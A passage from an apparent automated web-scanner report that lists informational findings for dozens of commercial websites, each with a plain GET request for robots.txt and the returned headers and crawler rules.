
Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:53:37 GMT
Server: Apache/2.2.10 (Unix)
Last-Modified: Thu, 09 Dec 2010 16:36:41 GMT
ETag: "33093-1a-496fcd7a9d840"
Accept-Ranges: bytes
Content-Length: 26
P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa PSAa PSDa OUR SAMa BUS PUR COM NAV INT"
Keep-Alive: timeout=5, max=37
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

24.239. http://www.detnews.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.detnews.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.detnews.com

Response

HTTP/1.1 200 OK
Content-Length: 908
Content-Type: text/plain
Last-Modified: Mon, 01 Nov 2010 15:27:40 GMT
Accept-Ranges: bytes
ETag: "0fef351d979cb1:0"
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM"
Date: Sat, 02 Apr 2011 14:20:14 GMT
Connection: keep-alive

# Robots.txt
# Be nice.
#
Sitemap: http://detnews.com/sitemap_index.xml
#
User-agent: MSIECrawler
Disallow: /*ARCHIVE*
Disallow: /
#
User-agent: *
Disallow: /*ARCHIVE*
Disallow: /apps/pbcs.
...[SNIP]...

24.240. http://www.deviantart.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.deviantart.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.deviantart.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:25:13 GMT
Server: Apache
Last-Modified: Tue, 15 Mar 2011 05:07:29 GMT
ETag: "e00014d-bb-49e7e67a86640"
Accept-Ranges: bytes
Content-Length: 187
_eep-Alive: timeout=45
_onnection: Keep-Alive
Content-Type: text/plain
Connection: close

User-agent: *
Disallow: /users/login
Disallow: /users/wrong-password
Disallow: /users/lost-password/
Disallow: /users/lost-password/process
Disallow: /checkout/
Disallow: /join/step2.php

24.241. http://www.dexknows.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dexknows.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dexknows.com

Response

HTTP/1.0 200 OK
Cteonnt-Length: 278
Content-Type: text/plain
Last-Modified: Wed, 23 Mar 2011 20:17:53 GMT
Cache-Control: private, max-age=982759
Date: Sat, 02 Apr 2011 13:45:32 GMT
Content-Length: 278
Connection: close

#DexKnows.com --- robots.txt

User-agent: *
Disallow: /search/
Disallow: /local/brands/
Disallow: /_css/
Disallow: /images/
Disallow: /js/
Disallow: /highslide-4.0.10/
Disallow: /notinclude
...[SNIP]...

24.242. http://www.dickssportinggoods.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dickssportinggoods.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dickssportinggoods.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:34:01 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Tue, 20 May 2008 14:38:16 GMT
ETag: "4bc508-168-44daa6e3b4600"
Accept-Ranges: bytes
Content-Length: 360
Cache-Control: max-age=172800
Expires: Mon, 04 Apr 2011 13:34:01 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /search/
Disallow: /searchhandler/
Disallow: /coreg/
Disallow: /cart/
Disallow: /cartHandler/
Disallow: /include/
Disallow: /checkout/
Disallow: /images/
Disallow: /ema
...[SNIP]...

24.243. http://www.digitaldesire.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.digitaldesire.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.digitaldesire.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sat, 02 Apr 2011 14:05:13 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Fri, 01 Apr 2011 16:59:08 GMT
Cache-Control: public, max-age=43200
Content-Length: 204
X-Varnish: 333868531 329859227
Age: 15693
Via: 1.1 varnish

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disallow
...[SNIP]...

24.244. http://www.directbuyvisitorpass.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.directbuyvisitorpass.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.directbuyvisitorpass.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:59:08 GMT
Server: Apache
Last-Modified: Thu, 16 Dec 2010 22:23:35 GMT
ETag: "1bd852c-82-4978e8129e7c0"
Accept-Ranges: bytes
Content-Length: 130
Cache-Control: max-age=54000
Expires: Sun, 03 Apr 2011 04:59:08 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /.svn/
Disallow: /cgi-bin/
Disallow: /images/
Disallow: /locations/
Disallow: /api/
Disallow: /templates/

24.245. http://www.directv.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.directv.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.directv.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 74
Content-Type: text/plain
Expires: Sat, 02 Apr 2011 13:25:11 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: ASPSESSIONIDACQSBBTB=HFBKPMFDFDFNILDEANAKCGIJ; path=/
Set-Cookie: TLTHID=601C20DE4363148F20C29DB1746F265A; Path=/; Domain=.directv.com
Set-Cookie: TLTSID=601C20DE4363148F20C29DB1746F265A; Path=/; Domain=.directv.com
Date: Sat, 02 Apr 2011 13:26:11 GMT
Connection: close

User-agent: 008
Disallow: /

User-agent: *
Disallow: /entertainment/

24.246. http://www.discovery.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.discovery.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.discovery.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.15 (Unix)
Last-Modified: Tue, 31 Mar 2009 18:38:18 GMT
ETag: "9bc1c-81-4666e80b4f3d8"
Accept-Ranges: bytes
Content-Length: 129
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:25:18 GMT
Connection: close

User-Agent: *
Allow: /

User-Agent: Googlebot-Image
Allow: /sharks/
Allow: /

User-agent: *
Disallow: /schedule/episode.jsp

24.247. http://www.dishnetwork.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dishnetwork.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dishnetwork.com

Response

HTTP/1.1 200 OK
Content-Length: 900
Content-Type: text/plain
Last-Modified: Tue, 15 Jun 2010 22:27:40 GMT
Accept-Ranges: bytes
ETag: "096e7f6d9ccb1:9b3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:27:30 GMT
Connection: close

User-agent: *
Sitemap: http://www.dishnetwork.com/sitemap.xml
Disallow: /about/careers/dish-installer/
Disallow: /aboutus/
Disallow: /allsat/
Disallow: /allsatcart/
Disallow: /App_Code/
Disallo
...[SNIP]...

24.248. http://www.diynetwork.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.diynetwork.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.diynetwork.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix)
Last-Modified: Tue, 30 Jun 2009 18:02:00 GMT
Accept-Ranges: bytes
Content-Type: text/plain
X-Pad: avoid browser bug
Content-Length: 542
Date: Sat, 02 Apr 2011 14:03:31 GMT
Connection: close

###############################
#
# diynetwork.com robots.txt file
#
# addresses all robots by using wild card *

User-agent: *


# list folders robots are not allowed to index

Disallow: /cr/
Di
...[SNIP]...

24.249. http://www.dmv.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dmv.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dmv.org

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 PHP/5.2.6
Vary: Accept-Encoding
Cache-Control: max-age=18000
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:43:22 GMT
Keep-Alive: timeout=5, max=40
Expires: Sat, 02 Apr 2011 18:43:22 GMT
Accept-Ranges: bytes
ETag: "308b17-18-4678956d7b400"
Connection: close
Last-Modified: Tue, 14 Apr 2009 20:04:32 GMT
Content-Length: 24

User-agent: *
Disallow:

24.250. http://www.docstoc.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.docstoc.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.docstoc.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 23 Mar 2011 00:39:51 GMT
Accept-Ranges: bytes
ETag: "85f18d2f2e8cb1:0"
serverID: www2
Date: Sat, 02 Apr 2011 13:30:53 GMT
Connection: keep-alive
Content-Length: 674

User-agent: *
Disallow: /*?catID=
Disallow: /*most-commented
Disallow: /*most-recent
Disallow: /*most-viewed
Disallow: /*highest-rated
Disallow: /*most-downloaded
Disallow: /*most-docs-this-wee
...[SNIP]...

24.251. http://www.doctoroz.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.doctoroz.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.doctoroz.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain; charset=UTF-8
ETag: "4f0f-511-48afd37d668c0"
Last-Modified: Sat, 10 Jul 2010 00:01:15 GMT
Server: Apache
Cache-Control: max-age=3600
Date: Sat, 02 Apr 2011 13:40:47 GMT
Content-Length: 1297
Connection: close

#
# For more information about the robots.txt standard, see:
# http://www.robotstxt.org/wc/robots.html
#
# For syntax checking, see:
# http://www.sxw.org.uk/computing/robots/check.html

Sitemap: http:
...[SNIP]...

24.252. http://www.dogpile.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dogpile.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Mar 2011 22:13:06 GMT
Accept-Ranges: bytes
ETag: "0451a5095edcb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:40:14 GMT
Connection: close
Content-Length: 151

User-agent: *
Disallow: /info.dogpl/kevmap2/
Disallow: /white-pages/
Disallow: /info.dogpl/white-pages/
Sitemap: http://www.dogpile.com/sitemap.xml

24.253. http://www.doityourself.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.doityourself.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.doityourself.com

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 24 Mar 2011 22:00:17 GMT
ETag: "aaf69e-3ba-49f419a48de40"
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
Content-Length: 954
Date: Sat, 02 Apr 2011 13:43:21 GMT
Age: 309691
Connection: close
Server: IBSrv 1.0
Set-Cookie: BIGipServerdiy_pool=1004867756.52514.0000; path=/

User-agent: *
Disallow:/smoothy/
Disallow:/assets/

User-agent: URL_Spider_Pro
Disallow: /

User-agent: CherryPicker
Disallow: /

User-agent: EmailCollector
Disallow: /

User-agent: Email
...[SNIP]...

24.254. http://www.domaintools.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.domaintools.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.domaintools.com

Response

HTTP/1.0 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
Content-Length: 850
Content-Type: text/plain;charset=utf-8
Date: Sat, 02 Apr 2011 13:45:12 GMT
Connection: close

# don't allow to use search tools

User-agent: LinkAider
Disallow: /

User-agent: link.ru
Disallow: /

User-agent: MLBot
Disallow: /

User-agent: Spinn3r
Disallow: /

User-agent: twiceler
Disallow: /

...[SNIP]...

24.255. http://www.dominos.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dominos.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dominos.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"52-1284682458000"
Last-Modified: Fri, 17 Sep 2010 00:14:18 GMT
Content-Type: text/plain
Content-Length: 52
Date: Sat, 02 Apr 2011 13:53:50 GMT
Connection: close

User-agent: *
Disallow: /home/
Disallow: /order/

24.256. http://www.doubleinks.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.doubleinks.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.doubleinks.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:04 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Tue, 14 Apr 2009 02:53:02 GMT
ETag: "d885da-18-4677aede93f80"
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain

User-Agent: *
Allow: /


24.257. http://www.dreamstime.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dreamstime.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dreamstime.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:12:27 GMT
Server: Apache
Last-Modified: Tue, 09 Jun 2009 13:50:14 GMT
ETag: "340012-1b-46beaa35ad180"
Accept-Ranges: bytes
Content-Length: 27
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Allow: /


24.258. http://www.driverside.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.driverside.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.driverside.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:00 GMT
Server: Apache/2.2.14 (EL)
Last-Modified: Fri, 11 Mar 2011 01:19:32 GMT
ETag: "8de5a1-181-49e2ac1147100"
Accept-Ranges: bytes
Content-Length: 385
Age: 25901
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /privacy
Disallow: /terms
Disallow: /mygarage
Disallow: /buy-or-sell
Disallow: /app
Disallow: /new
Disallow: /repair-estimates
Sitemap: http://www.driverside.com/mmh_si
...[SNIP]...

24.259. http://www.droidforums.net/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.droidforums.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.droidforums.net

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:54:48 GMT
Server: Apache
Last-Modified: Wed, 13 Jan 2010 13:35:20 GMT
ETag: "8abec9-250-47d0bd7793600"
Accept-Ranges: bytes
Content-Length: 592
Cache-Control: max-age=0
Expires: Sat, 02 Apr 2011 13:54:48 GMT
Connection: close
Content-Type: text/plain

Sitemap: http://www.droidforums.net/forum/sitemap_index.xml.gz

User-agent: Mediapartners-Google
Disallow:
Allow: /*

User-agent: Mediapartners-Google*
Disallow:
Allow: /*

User-agent: *
Disallow: /*-
...[SNIP]...

24.260. http://www.drugs.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.drugs.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.drugs.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:25:58 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: User-Agent
Content-Length: 265
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /search_landing.php
Disallow: /interactions-list-drugs.php
Disallow: /yap/
Disallow: /js/
Disallow: /forum/members/


User-agent: Wget
Disallow: /

User-agent: Offline Explorer
...[SNIP]...

24.261. http://www.drugstore.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.drugstore.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.drugstore.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 816
Content-Type: text/html; charset=utf-8
Expires: Fri, 01 Apr 2011 13:39:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=bjj3ibrphmzmxza3xqbej455; path=/; HttpOnly
Set-Cookie: STICKY=SEAWEB018P:88186096F772452EA73A2290DD74ED5F:q4ck2145o0ahi5fjr0mm4jif; domain=.drugstore.com; expires=Thu, 15-Jan-2037 08:00:00 GMT; path=/
Set-Cookie: drugstore%2Efish=UserID=B326603FB0D5447EBDAA7158BC29CA1E; domain=.drugstore.com; expires=Thu, 15-Jan-2037 08:00:00 GMT; path=/
P3P: CP=CAO DSP COR CUR ADM DEV TAI PSD IVD CONi OUR DEL OTRo IND
Date: Sat, 02 Apr 2011 13:39:13 GMT
Connection: close
Set-Cookie: BIGipServerdscm_farm=1981065408.0.0000; expires=Sat, 02-Apr-2011 14:39:14 GMT; path=/

Sitemap: http://www.drugstore.com/sitemap.asp?catid=1&SiteMapIndex=true
User-agent: *
Disallow: /cart.asp
Disallow: /list.asp
Disallow: /onorder.asp
Disallow: /checkout/
Disallow: /user/
Disall
...[SNIP]...

24.262. http://www.dslreports.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dslreports.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dslreports.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 14:03:16 GMT
Content-Type: text/plain
Content-Length: 1436
Last-Modified: Fri, 26 Nov 2010 01:40:49 GMT
Connection: close
Accept-Ranges: bytes

# robots.txt for http://www.dslreports.com
User-agent: Mediapartners-Google*
Disallow:
User-agent: *
Disallow: /tp
Disallow: /r0/download/
Disallow: /postlist/
Disallow: /gmaps/dslr/
Disallow: /autoc
...[SNIP]...

24.263. http://www.earthlink.net/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.earthlink.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.earthlink.net

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:42:53 GMT
Server: elnws
Last-Modified: Fri, 11 Apr 2008 03:57:02 GMT
Accept-Ranges: bytes
Content-Length: 248
Vary: Accept-Encoding
Keep-Alive: timeout=4, max=99
Connection: Keep-Alive
Content-Type: text/plain

# robots.txt for http://www.earthlink.net

User-agent: *

Disallow: /img
Disallow: /i
Disallow: /css
Disallow: /js
Disallow: /error
Disallow: /wifi
Disallow: /wireless
Disallow: /mobile
Disallow: /sa

...[SNIP]...

24.264. http://www.eastbay.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eastbay.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.eastbay.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "4e8ff9a931d428bf6388e9b72207adb8:1279659346"
Last-Modified: Tue, 20 Jul 2010 20:55:46 GMT
Accept-Ranges: bytes
Content-Length: 271
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:45:53 GMT
Connection: close
X-N: S

# Modified 03.19.10
User-agent: *
Disallow: /account/
Disallow: /wishlist/
Disallow: /catalog/shoppingCart/
Disallow: /catalog/emptyCart.cfm
Disallow: /shoppingcart/
Disallow: /checkout/
Disallow: /s7
...[SNIP]...

24.265. http://www.eatingwell.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eatingwell.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.eatingwell.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:18:56 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sat, 29 Aug 2009 15:48:56 GMT
Accept-Ranges: bytes
Content-Length: 1590
Cache-Control: max-age=1209600
Expires: Sat, 16 Apr 2011 14:18:56 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

24.266. http://www.ebaumsworld.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebaumsworld.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ebaumsworld.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:32 GMT
Server: Apache/2.2.17 (EL)
Last-Modified: Mon, 21 Mar 2011 03:23:02 GMT
Accept-Ranges: bytes
Content-Length: 62
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /adcodes/
Disallow: /pictures/enlarge/

24.267. http://www.ebay.ca/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebay.ca
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ebay.ca

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/plain;charset=ISO-8859-1
Content-Length: 659
Vary: Accept-Encoding
Expires: Sat, 02 Apr 2011 14:10:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 14:10:05 GMT
Connection: close

### BEGIN FILE ###
#
# allow-all
#
#
# The use of robots or other automated means to access the eBay site
# without the express permission of eBay is strictly prohibited.
# Notwithstanding the foregoi
...[SNIP]...

24.268. http://www.ebayclassifieds.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebayclassifieds.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ebayclassifieds.com

Response

HTTP/1.0 200 OK
Connection: keep-alive
Server: Apache-Coyote/1.1
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private=Set-Cookie
Set-Cookie: p=""; Domain=ebayclassifieds.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/plain;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 94
Date: Sat, 02 Apr 2011 13:39:12 GMT

User-agent: *
Disallow: /m/
Disallow: /f/
Sitemap: http://www.ebayclassifieds.com/sitemap.xml

24.269. http://www.economist.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.economist.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.economist.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 25 Mar 2011 15:58:34 GMT
ETag: "78610-534-49f50aa86be80"
Cache-Control: max-age=1209600
Expires: Tue, 12 Apr 2011 08:21:29 GMT
X-ws: 4
Content-Type: text/plain; charset=UTF-8
Content-Length: 1332
Date: Sat, 02 Apr 2011 13:54:47 GMT
X-Varnish: 1459381544 1449342434
Age: 365598
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: HIT
Vary: Accept-Encoding

# robots.txt
#

# Sitemap

Sitemap: http://www.economist.com/googlenews.xml

# No robots are allowed to index private paths:

User-agent: *
# Directories
Disallow: /includes/
Disallow: /misc/
Disallow
...[SNIP]...

24.270. http://www.edmunds.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.edmunds.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.edmunds.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain; charset=ISO-8859-1
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="http://www.edmunds.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Expires: Sat, 02 Apr 2011 13:24:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:24:30 GMT
Content-Length: 1311
Connection: close


User-agent: *
Disallow: /apps/log/PartnerLogServlet
Disallow: /products/gmbp/GMlinkConfigurator
Disallow: /apps/redirector/RedirectController
Disallow: /apps/dcm/

...[SNIP]...

24.271. http://www.education.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.education.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.education.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 13:34:11 GMT
Content-Type: text/plain
Content-Length: 104
Last-Modified: Mon, 28 Feb 2011 18:40:24 GMT
Connection: close
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
Accept-Ranges: bytes

Sitemap: http://www.education.com/sitemapindex.xml

User-agent: *
Disallow: /admin/
Disallow: /results/

24.272. http://www.egotastic.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.egotastic.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.egotastic.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:58 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Content-Length: 631
Connection: close
Content-Type: text/html; charset=UTF-8

User-agent: *
Disallow: /cgi-bin/
Disallow: /css/
Disallow: /default-page/
Disallow: /includes/ad/
Disallow: /includes/counter/
Disallow: /includes/email/
Disallow: /includes/message/
Disallow: /inclu
...[SNIP]...

24.273. http://www.eharmony.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eharmony.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.eharmony.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:38:39 GMT
Server: Apache/2.2.16 (Unix)
Last-Modified: Tue, 28 Apr 2009 01:33:15 GMT
ETag: "1157-46893725cacc0"
Accept-Ranges: bytes
Content-Length: 4439
Cache-Control: max-age=900
Expires: Sat, 02 Apr 2011 13:53:39 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
Set-Cookie: BIGipServerFront=3910078892.16671.0000; path=/
Set-Cookie: lbid=67c62384-b369-4692-650d-a479b0a1b13a;expires=Thu, 29-Sep-2011 13:38:39 GMT;path=/;domain=.eharmony.com;

sitemap: /sitemap.gz

User-agent: *
Disallow: /singles/

User-agent: *
Disallow: /static/

User-agent: *
Disallow: /assets/

User-agent: *
Disallow: /src/

User-agent: *
Disallow: /sbm
...[SNIP]...

24.274. http://www.ehealthforum.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ehealthforum.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ehealthforum.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:04 GMT
Server: Apache
Last-Modified: Thu, 04 Mar 2010 09:23:44 GMT
ETag: "fe98a8-190-480f627bf4800"
Accept-Ranges: bytes
Content-Length: 400
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
Set-Cookie: BIGipServerehealthforum_POOL=3336900780.0.0000; path=/

User-agent: *
Disallow: /health/terms.html
Disallow: /health/jump.php
Disallow: /health/jump_confirm.php
Disallow: /health/pregnancy_calander.html
Disallow: /health/medical_symptoms.html
Disallow: /he
...[SNIP]...

24.275. http://www.ehow.co.uk/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ehow.co.uk
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ehow.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Content-Length: 225
Content-Type: text/plain
